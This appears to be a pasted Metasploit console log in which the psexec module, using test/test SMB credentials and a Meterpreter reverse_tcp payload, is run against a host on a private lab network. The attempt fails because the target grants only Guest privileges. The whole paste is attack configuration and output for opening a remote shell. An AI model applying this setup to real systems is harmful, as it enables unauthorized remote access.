Advertisement
Guest User

Untitled

a guest
Oct 12th, 2010
233
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.33 KB | None | 0 0
  1. msf exploit(psexec) > show options
  2.  
  3. Module options:
  4.  
  5. Name Current Setting Required Description
  6. ---- --------------- -------- -----------
  7. RHOST 192.168.1.101 yes The target address
  8. RPORT 445 yes Set the SMB service port
  9. SMBPass test no The password for the specified username
  10. SMBUser test yes The username to authenticate as
  11.  
  12.  
  13. Payload options (windows/meterpreter/reverse_tcp):
  14.  
  15. Name Current Setting Required Description
  16. ---- --------------- -------- -----------
  17. EXITFUNC process yes Exit technique: seh, thread, process
  18. LHOST 192.168.67.129 yes The listen address
  19. LPORT 4445 yes The listen port
  20.  
  21.  
  22. Exploit target:
  23.  
  24. Id Name
  25. -- ----
  26. 0 Automatic
  27.  
  28.  
  29. msf exploit(psexec) > exploit
  30.  
  31. [*] Started reverse handler on 192.168.67.129:4445
  32. [*] Connecting to the server...
  33. [*] Authenticating as user 'test'...
  34.  
  35. [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
  36.  
  37. [*] Exploit completed, but no session was created.
  38. msf exploit(psexec) >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement